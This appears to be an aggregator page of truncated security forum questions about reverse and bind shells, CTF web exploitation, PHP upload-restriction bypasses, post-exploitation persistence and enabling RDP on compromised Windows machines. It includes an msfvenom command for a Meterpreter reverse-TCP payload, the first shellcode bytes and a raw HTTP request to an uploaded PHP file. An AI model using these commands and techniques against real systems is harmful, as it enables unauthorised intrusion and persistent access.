Collaborate Disseminate
I understood the difference between them. The problem is I am not sure when to use each. I mean, if a firewall will block my connection to the target when I use bind shell, why the connection will not be blocked, when I send the payload ag… Continue reading Why is a bind shell sometimes blocked when a reverse shell is not?
I am doing a CTF style web exploit challenge which should be a ‘simple’ RCE.
I have two potential avenues, one of which is an image upload where I have already bypassed restrictions on file types by changing the character casing on phP.
… Continue reading Is PHP safe mode enabled on target webserver? [closed]
Let’s assume I’m a user with root access to a machine and I’m a legit user. My machine/server runs Linux. I’m not very familiar with defensive security (I mainly practice offensive). Sometimes, popping shells can be as easy a… Continue reading How to detect backdoor/root shells?
Say I have nt authority / system remote shell access locally to another windows home system.
How could I enable RDP on systems with it disabled by default, or is there a way to gain remote desktop access (like vnc etc) throug… Continue reading Enabling RDP on windows home machines with only cmd/powershell access
So imagine that I have acquired a reverse shell and have a terminal with full root access. I know I can do anything, but what should I do? What’s the next step?
EDIT: My current goal is to persist my current connection and t… Continue reading What to do after getting a reverse shell? [closed]
POST /uploads/support.php HTTP/1.1
Accept-Encoding: identity
Content-Length: 175
Host: 34.76.8.86
Content-Type: application/x-www-form-urlencoded
Connection: close
User-Agent: Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.8…. Continue reading Trying to examine reverse shell in Wireshark i dont kwno how to decrypt
Does the metasploit module: exploit/multi/handler
sends payloads to stagers?
Or does it just listens for an incoming connection like a netcat
listener?
Or does it do both, as needed?
So after running the command:
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.0.0.31 lport=8080 -f py
I receive the output:
buf = b””
buf += b”\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b”
buf += b”\x50\x30\x… Continue reading Executing shellcode in python format [on hold]
I was able to bypass file upload restriction on an application. I uploaded a dummy php file on the server, I found the URL where it is on the server by looking at the response but it didn’t executed. It showed me the source c… Continue reading Is there any file extension which executes by itself or is considered malicious even if its at server?
So, I’m trying to solve a CTF challenge that involves exploiting a remote service. The service doesn’t check for the size of the input and there is a buffer overflow vulnerability. However, before I can hijack the control flo… Continue reading Reverse TCP – Bind to a specific port